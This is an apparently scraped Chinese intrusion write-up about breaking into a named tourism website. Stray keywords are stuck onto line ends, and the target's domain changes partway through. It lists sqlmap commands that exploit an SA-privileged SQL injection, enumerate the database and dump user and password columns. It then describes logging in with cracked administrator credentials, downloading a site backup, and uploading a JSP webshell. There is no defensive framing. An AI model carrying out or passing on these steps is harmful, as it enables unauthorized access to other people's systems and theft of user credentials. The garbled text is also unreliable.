目标:python
http://www.djj.com/yz/cn/videodt.jsp?Videoid=10
此URL为sa权限猪肉一块
用穿山甲不能执行命令
过程以下:
经过访问
http://www.djj .com/login.jsp
得知该站由一论坛搭建
注册普通用户访问
http://www.djj .com/admin/index.htm
得知该站由
http://www.easyjforum.cn/ejf_download.jsp
EasyJForum 论坛程序改编而来。sql
既然有了SA权限的注入点那就祭出神器sqlmap来跑下注入点
启动BT5,打开sqlmap,输入命令shell
python ./sqlmap.py -u http://www.yangzhoutour.com/yz/cn/videodt.jsp?Videoid=10数据库
检测结果如图:jsp
目标数据库为:Microsoft SQL Server2005
接着执行命令:ide
python ./sqlmap.py -u http://www.djj.com/yz/cn/videodt.jsp?Videoid=10 –current-db –current-user网站
执行结果如图:加密
获得当前用户为:sa
数据库名:tour-2010-11-24spa
接下来咱们列下表执行:htm
python ./sqlmap.py -u http://www.djj.com/yz/cn/videodt.jsp?Videoid=10 –tables -D tour-2010-11-24
列出所有表如图:
过下载EasyJForum 原程序找到论坛后台用户表以及相关用户密码字段
执行命令:
python ./sqlmap.py -u http://www.yangzhoutour.com/yz/cn/videodt.jsp?Videoid=10 –columns -T ejf_user users-D tour-2010-11-24 -v 0
在列出的用户名和密码列表中发现此用户
破解后获得
帐户:administrator
密码:administrator
用获得的用户信息尝试登录
http://www.djj.com/admin/index.htm
成功进入,在后台浏览了一遍没有找到拿shell方法。不过发现了一个这个功能
如今有两个方法拿shell了:
1. 经过修改管理员联系邮箱为本身邮箱地址而后经过数据备份功能将网站目录备份发送到个人邮箱
2. 经过上图猜想管理员应该执行过备份。能够经过下载备份文件获得数据库配置等信息拿shell。
我直接访问域名+1.rar,下载了该备份文件。
在该备份文件中查找到了网站真正后台地址:
http://www.djj.com/yz/Manage/admin_login.jsp
以及用户表及相关用户名和密码的字段
表名:GlUserInfo
用户:username
密码:password (MD5加密后40位)
真正密码:passwd(未加密明文 )
执行命令:
python ./sqlmap.py -u http://www.djj.com/yz/cn/videodt.jsp?Videoid=10 –dump -C username,passwd,password -T gluserinfo -D tour-2010-11-24 -v 0
获得用户及密码:
使用获得的用户名和密码登录后台,找个上传图片的地方直接上传了jspshell。